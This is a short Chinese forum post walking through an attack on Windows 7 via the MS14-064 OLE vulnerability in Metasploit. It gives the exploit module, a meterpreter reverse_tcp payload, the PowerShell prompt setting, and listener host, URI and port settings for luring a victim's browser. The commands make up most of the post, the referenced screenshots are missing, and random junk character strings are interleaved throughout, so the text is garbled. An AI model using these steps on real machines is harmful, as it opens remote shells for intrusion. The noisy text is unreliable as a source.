找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1393|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

! k) r1 v K" v4 p! T 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ j. [$ h9 e$ f, S( o) a

' r5 x7 R: W/ q L0 b2 l | A

$ h7 i8 i+ B: D O" f v 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ( D) K7 y6 m: H3 n7 r5 }1 H

; g4 O) r5 i* h. C$ ^" l. B7 I$ `$ _

3 F0 V/ X+ q4 W; g! _ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp % y* t7 n' d: m# J3 B6 K$ e j

# k' { p& ^# {, a3 U* S- ~

6 K* K+ B2 Y$ l8 W             set AllowPowershellPrompt true' J6 e# w4 \2 l$ k

. d; c. `4 i5 j) z" Z

! b. D! V9 M: w/ L- `( C) F             Set LHOST 192.168.0.1093 H/ a' S! P& e( [0 l# C1 N$ J* F

, X1 r# n1 U6 V k/ x& @

* t# N( p1 g. c             set SRVHOST 192.168.0.1097 L5 d8 \" \3 [3 S' J

5 s( z7 r, c/ o3 H

! Q A/ a, h# N3 ~             Set uripath share! E' h! U9 H3 D3 M% P% p

$ k2 G$ @# J: h% v9 N4 v

5 i( z: K: f7 e; P5 \& @/ U             Set srvport 80 4 E' \. @, e: @" m) k; T

6 P) Q3 _( g9 \- {( k

/ }% P. c" i& C( h+ A   ( w. F9 y+ V* }* ?6 @0 G

4 W, n' U9 S. I9 P

1 }8 v; p! e9 y- Z$ `" R   ! d& u6 R* V2 I9 s( A# ~

5 N1 P# @2 v! F3 A

' g" k5 v d5 I+ c3 S3 m; I  $ L# r! w9 g, _" A

. O, Y' d8 X, |6 c

) X( L5 t& A2 [1 R+ Z  5 L* S# d, u: r0 [

) |) M, w o7 w! r1 i

4 E, b+ W7 F/ l3 O) J  ; c4 F& S8 G/ b3 W# V

* a" v, y( K, ?. Y

1 F6 F3 s9 U: O: X 下面我们来访问本地地址如图: 9 i" n! B5 t6 Q4 g5 r2 i

5 O' @: X3 y- l2 M, T

/ g) g$ W$ j+ v9 R: ]   `% r3 t3 A1 [) ~

! V: }) [% b& F l% k! P

* @/ K, C* s' U. ^: w  7 B* S0 N% L+ _8 A% A

) f$ m# {1 I$ k: n l

2 E; f4 F; E4 [( I $ _) a; m1 ~8 A# q% Z

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表